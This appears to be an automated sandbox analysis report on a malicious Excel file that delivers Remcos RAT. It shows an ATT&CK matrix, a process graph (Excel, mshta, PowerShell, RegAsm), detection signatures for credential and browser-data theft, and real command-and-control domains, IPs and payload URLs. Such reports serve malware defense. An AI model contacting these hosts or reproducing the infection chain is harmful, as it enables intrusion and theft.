                Clipboard Data                		213
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials3
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Virtualization/Sandbox Evasion                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
                Process Injection                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1508122 Sample: RFQ_0230909024SEPT.xla.xlsx Startdate: 09/09/2024 Architecture: WINDOWS Score: 100 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 22 other signatures 2->91 13 EXCEL.EXE 29 20 2->13         started        process3 dnsIp4 81 185.235.137.223, 49164, 49166, 49167 AFRARASAIR Iran (ISLAMIC Republic Of) 13->81 83 zeep.ly 95.217.202.210, 443, 49163, 49165 HETZNER-ASDE Germany 13->83 67 C:\Users\...\~$RFQ_0230909024SEPT.xla.xlsx, data 13->67 dropped 69 C:\Users\...\IEnetcateudpationprocess[1].hta, HTML 13->69 dropped 145 Microsoft Office drops suspicious files 13->145 18 mshta.exe 10 13->18         started        file5 signatures6 process7 dnsIp8 71 zeep.ly 18->71 93 Suspicious command line found 18->93 95 PowerShell case anomaly found 18->95 22 cmd.exe 18->22         started        signatures9 process10 signatures11 107 Suspicious powershell command line found 22->107 109 Wscript starts Powershell (via cmd or directly) 22->109 111 PowerShell case anomaly found 22->111 25 powershell.exe 23 22->25         started        process12 file13 63 C:\Users\...\pictureupdatedwithnewqualit.vbS, Unicode 25->63 dropped 65 C:\Users\user\AppData\...\sepiowy3.cmdline, Unicode 25->65 dropped 117 Suspicious powershell command line found 25->117 119 Installs new ROOT certificates 25->119 121 Suspicious execution chain found 25->121 29 wscript.exe 1 25->29         started        32 csc.exe 2 25->32         started        signatures14 process15 file16 123 Suspicious powershell command line found 29->123 125 Wscript starts Powershell (via cmd or directly) 29->125 127 Very long command line found 29->127 129 3 other signatures 29->129 35 powershell.exe 4 29->35         started        61 C:\Users\user\AppData\Local\...\sepiowy3.dll, PE32 32->61 dropped 38 cvtres.exe 32->38         started        signatures17 process18 signatures19 97 Suspicious powershell command line found 35->97 40 powershell.exe 12 5 35->40         started        process20 dnsIp21 73 ia601706.us.archive.org 207.241.227.96, 443, 49168 INTERNET-ARCHIVEUS United States 40->73 113 Writes to foreign memory regions 40->113 115 Injects a PE file into a foreign processes 40->115 44 RegAsm.exe 3 10 40->44         started        48 RegAsm.exe 40->48         started        50 RegAsm.exe 40->50         started        signatures22 process23 dnsIp24 75 camzeroconnect.duckdns.org 44->75 77 camzeroconnect.duckdns.org 192.3.101.29, 14645, 49170, 49171 AS-COLOCROSSINGUS United States 44->77 79 geoplugin.net 178.237.33.50, 49172, 80 ATOM86-ASATOM86NL Netherlands 44->79 131 Detected Remcos RAT 44->131 133 Maps a DLL or memory area into another process 44->133 52 RegAsm.exe 44->52         started        55 RegAsm.exe 44->55         started        57 RegAsm.exe 44->57         started        59 5 other processes 44->59 135 Contains functionality to bypass UAC (CMSTPLUA) 48->135 137 Tries to steal Mail credentials (via file registry) 48->137 139 Contains functionalty to change the wallpaper 48->139 143 5 other signatures 48->143 signatures25 141 Uses dynamic DNS services 75->141 process26 signatures27 99 Tries to steal Instant Messenger accounts or passwords 52->99 101 Tries to steal Mail credentials (via file / registry access) 52->101 103 Searches for Windows Mail specific files 52->103 105 Tries to harvest and steal browser information (history, passwords, etc) 55->105

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ_0230909024SEPT.xla.xlsx13%ReversingLabs
                RFQ_0230909024SEPT.xla.xlsx100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%Avira URL Cloudsafe
                https://zeep.ly/c0%Avira URL Cloudsafe
                http://www.nirsoft.netX0%Avira URL Cloudsafe
                http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
                http://acdn.adnxs.com/ast/ast.js0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta40%Avira URL Cloudsafe
                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%Avira URL Cloudsafe
                http://www.imvu.comr0%Avira URL Cloudsafe
                http://ocsp.entrust.net030%Avira URL Cloudsafe
                http://www.imvu.com/uK0%Avira URL Cloudsafe
                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%Avira URL Cloudsafe
                https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta0%Avira URL Cloudsafe
                https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                http://185.235.137.2230%Avira URL Cloudsafe
                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%Avira URL Cloudsafe
                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                http://go.micros0%Avira URL Cloudsafe
                http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%Avira URL Cloudsafe
                http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htasdVpl(C0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe
                http://o.aolcdn.com/ads/adswrappermsni.js0%Avira URL Cloudsafe
                http://185.235.137.223pB70%Avira URL Cloudsafe
                http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                http://static.chartbeat.com/js/chartbeat.js0%Avira URL Cloudsafe
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%Avira URL Cloudsafe
                http://go.cr0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta...0%Avira URL Cloudsafe
                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%Avira URL Cloudsafe
                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%Avira URL Cloudsafe
                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htapVpl(0%Avira URL Cloudsafe
                camzeroconnect.duckdns.org100%Avira URL Cloudmalware
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%Avira URL Cloudsafe
                http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                http://185.235.137.223/0%Avira URL Cloudsafe
                https://www.ccleaner.com/go/app_cc_pro_trialkey0%Avira URL Cloudsafe
                https://ia601706.us.archive.org/2/items/new_image_0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htaC:0%Avira URL Cloudsafe
                https://zeep.ly/0%Avira URL Cloudsafe
                http://www.imvu.com0%Avira URL Cloudsafe
                https://contextual.media.net/8/nrrV73987.js0%Avira URL Cloudsafe
                http://185.235.137.223/200/pictureupdatedwithnewquality.tIF0%Avira URL Cloudsafe
                http://185.235.137.223/200/pictu0%Avira URL Cloudsafe
                https://contextual.media.net/0%Avira URL Cloudsafe
                http://185.235.137.223/200/pictureupdatedwithnewquality.tIFp0%Avira URL Cloudsafe
                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%Avira URL Cloudsafe
                http://185.235H0%Avira URL Cloudsafe
                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%Avira URL Cloudsafe
                http://www.msn.com/0%Avira URL Cloudsafe
                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                http://185.235.137.223/200/NRSCER.txt0%Avira URL Cloudsafe
                https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg0%Avira URL Cloudsafe
                https://ia601706.us.archive.org0%Avira URL Cloudsafe
                https://zeep.ly/yDfvh0%Avira URL Cloudsafe
                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%Avira URL Cloudsafe
                http://185.235.137.223/200/Nh0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htajVpl(0%Avira URL Cloudsafe
                http://cdn.at.atwola.com/_media/uac/msn.html0%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htahttp://185.235.137.223/xampp/ceo/IEnetc0%Avira URL Cloudsafe
                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%Avira URL Cloudsafe
                https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
                https://policies.yahoo.com/w3c/p3p.xml0%Avira URL Cloudsafe
                http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                camzeroconnect.duckdns.org
                		192.3.101.29
                		truetrue
                  		unknown
                  zeep.ly
                  		95.217.202.210
                  		truefalse
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      ia601706.us.archive.org
                      		207.241.227.96
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htatrue
                        • Avira URL Cloud: safe
                        		unknown
                        camzeroconnect.duckdns.orgtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.235.137.223/200/pictureupdatedwithnewquality.tIFtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/200/NRSCER.txttrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpgtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://zeep.ly/yDfvhfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://b.scorecardresearch.com/beacon.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta4mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://acdn.adnxs.com/ast/ast.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comrRegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net03mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.netXRegAsm.exe, 00000015.00000002.515513667.0000000000203000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://zeep.ly/cmshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.com/uKRegAsm.exe, 0000001A.00000002.511865097.00000000003FC000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000015.00000002.516533065.0000000002378000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C204000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://deff.nelreports.net/api/report?cat=msnbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://go.microspowershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.505047293.0000000003440000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cache.btrll.com/default/Pix-1x1.gifbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htasdVpl(Cmshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223pB7powershell.exe, 0000000E.00000002.505047293.0000000002785000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://o.aolcdn.com/ads/adswrappermsni.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/?ocid=iehpbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://static.chartbeat.com/js/chartbeat.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/de-de/?ocid=iehpbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://login.yahoo.com/config/loginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.net/RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.490691993.0000000002271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.524628832.0000000002481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.505047293.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta...mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://go.crpowershell.exe, 0000000E.00000002.504689494.00000000003CC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htapVpl(mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.235.137.223/mshta.exe, 00000004.00000003.474232984.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003752000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.ccleaner.com/go/app_cc_pro_trialkeybhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ia601706.us.archive.org/2/items/new_image_powershell.exe, 0000000C.00000002.524628832.00000000027A7000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htaC:mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/8/nrrV73987.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.512058781.0000000000459000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.235.137.223/200/pictupowershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zeep.ly/mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476695899.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
